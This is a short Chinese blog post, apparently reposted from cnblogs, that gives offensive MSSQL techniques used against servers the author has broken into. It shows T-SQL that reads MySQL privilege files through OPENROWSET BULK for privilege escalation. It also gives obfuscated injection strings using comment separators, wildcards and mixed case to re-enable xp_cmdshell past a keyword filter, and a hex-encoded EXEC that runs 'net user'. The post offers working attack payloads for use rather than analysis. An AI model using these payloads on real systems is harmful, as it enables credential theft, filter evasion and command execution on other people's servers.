码迷,mamicode.com
首页 > 数据库 > 详细

MSSQL 小技巧

时间:2015-03-07 18:30:31      阅读:172      评论:0      收藏:0      [点我收藏+]

标签:

Title:MSSQL 小技巧  --2012-12-31 11:29

1.

某日一个MSSQL 2008降权,想用MYSQL 3306外联提权,无ROOT密码,遂读取MYSQL文件,导出。

MSSQL 读取二进制/EXE/dat等文件

参考 http://hi.baidu.com/_ccsec/item/be4f68481bf3c8ba61d7b90e

 

--drop table tbldata;

--Create table tblData(FileId int,FileData varbinary(max));

--Insert into tblData (FileId, FileData) SELECT 1, BulkColumn FROM OPENROWSET(BULK N‘C:\Program Files\MySQL\MySQL Server 5.5\data\mysql\user.frm‘, SINGLE_BLOB) AS Document;

--select * from tbldata

 

<1>

cd "C:\Program Files\MySQL\MySQL Server 5.5\bin"

mysqld.exe --skip-grant-tables

<2>

读取三文件,修改为其他表名,查询之...

 

2.

某日鼓捣某站,MSSQL 2005,SA权限,遂开启XP_CMDSHELL,但是XP_CMDSHELL作为关键字被拦截,测试可以简写开启,绕过...

//能够匹配成xp_cmdshell即可...

以下两种不同的方法:

<1>

ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%‘,/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/‘show%%%%%%advanced%%%%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘%%%%%%%%xp_cMd%%%%%%‘,/**/1;RECONFIGURE;--

ExECuTe/**/sp_configure/**/‘show%%advanced%%options‘,/**/1;RECONFIGURE;eXeCuTe/**/sp_configure/**/‘xp_cMd%el%‘,/**/1;RECONFIGURE;--

技术分享

<2>//这个是常用的...

declare/**/@a/**/varchar(100)/**/set/**/@a=0x6d61737465722e64626f2e78705f636d647368656c6c declare @b varchar(20)set @b=0x6e65742075736572;eXEC/**/@a/**/@b

 

MSSQL 小技巧

标签:

原文地址:http://www.cnblogs.com/TeaIng-Index/p/4320677.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!